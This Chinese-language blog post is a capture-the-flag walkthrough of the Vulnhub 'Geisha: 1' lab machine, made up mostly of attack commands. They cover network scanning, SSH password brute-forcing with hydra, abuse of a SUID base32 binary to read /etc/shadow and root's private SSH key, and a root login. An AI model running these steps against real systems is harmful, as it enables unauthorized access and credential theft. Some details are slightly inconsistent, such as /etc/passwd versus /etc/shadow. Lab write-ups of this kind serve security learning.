往期博文:
[網絡安全學習篇78]:Sumo: 1.1 Vulnhub 實戰(髒牛漏洞提權)
[網絡安全學習篇79]:Geisha: 1 Vulnhub 實戰(本篇)
下期博文:
目錄
信息收集
arp-scan -l
nmap -A 192.168.1.173 -p- -oN nmap.A
gobuster
gobuster dir -u http://192.168.1.173:7125/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
掃描得到/passwd
curl http://192.168.1.173:7125/passwd -o passwd && cat passwd | grep home
攻擊
hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.173 -o hydra.geisha && cat hydra.geisha
得到賬密:
[22][ssh] host: 192.168.1.173 login: geisha password: letmein
ssh 登錄成功
提權
查找具有suid權限的文件
find / -perm -4000 2>/dev/null
使用以下命令,用base32 讀取訪問受限制的文件 /etc/passwd ,讀取成功
base32 "/etc/shadow" | base32 --decode
嘗試使用ssh 登錄root,使用以下命令獲得在/root/.ssh 目錄下的root用戶登錄ssh 的私鑰
base32 "/root/.ssh/id_rsa" | base32 --decode
拿到flag
拿到其私鑰之後,我們可以直接在本地使用該私鑰登錄root | ssh
vim root.src.key
chmod 777 root.src.key
ssh [email protected] -i root.src.key
flag:
Flag{Sun_CTF_220_5_G31sha}
參考博文: